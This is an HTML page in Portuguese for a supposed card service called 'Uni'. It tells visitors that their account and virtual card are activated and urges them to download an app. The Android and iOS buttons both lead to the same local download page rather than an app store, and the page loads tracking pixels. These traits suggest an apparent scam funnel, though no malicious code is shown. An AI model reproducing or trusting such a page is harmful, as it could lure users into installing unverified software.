<html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Uni - Faça seu Cartão</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/style.css">

    <style>
        html, body {
            height: 100%;
            margin: 0;
            display: flex;
            flex-direction: column;
        }
        .main-content {
            flex: 1; /* Faz com que a main-content cresça para ocupar o espaço disponível */
            max-width: 450px;
            margin: 30px auto;
            padding: 20px;
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.1);
        }
        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            padding: 10px 0;
            padding-top: 10px;
            padding-bottom: 10px;
            position: relative !important; 
            width: 100%;
            bottom: 0;
        }
        ul li {
            padding-top: 7px;
        }
    </style>
    
    <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-subids
    async
    defer
  ></script>
  
<script>
  window.pixelId = "66bb763debbcebab27d68442";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="https://cdn.utmify.com.br/scripts/pixel/pixel.js"></script>
    
</head>

<body>
<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">   
    <div class="header">
        <img style="width: 120px;" src="https://i.imgur.com/Q0PyyEg.png" alt="Imagem Centralizada">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 18px;" class="main-content text-center">
        <h1 style="color: #27ae60;">Hora de baixar o nosso Aplicativo!</h1>
        <p>Meus parabéns! Sua conta está ativada e seu cartão virtual pronto para uso. Agora é só <strong>baixar o nosso App e acessar a sua Conta Digital</strong>.</p>

        <h4 class="text-pink" style="font-weight: bold;color: #e1077f;">Selecione a sua opção abaixo:</h4>

        <a href="./download/index.html" style="text-decoration: none;" id="7c12fc44-d9b0-b81f-7fa8-c220c3779c57">
          <button type="button" id="ativarConta" class="btn btn-custom rounded-pill w-100 mt-3">Baixar no meu celular Android</button>
        </a>

        <a href="./download/index.html" style="text-decoration: none;" id="7c12fc44-d9b0-b81f-7fa8-c220c3779c57">
            <button type="button" id="ativarConta" class="btn btn-custom rounded-pill w-100 mt-3">Baixar no meu celular IOS Apple</button>
          </a>

        </div>
    </div>    

    <div class="footer py-4">
        © 2024 Uni S/A. CNPJ 39.433.535/0001-91. <br>
         Avenida Presidente Wilson, 9, São Vicente/SP - CEP 11320-905
    </div>
</div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>


</body></html>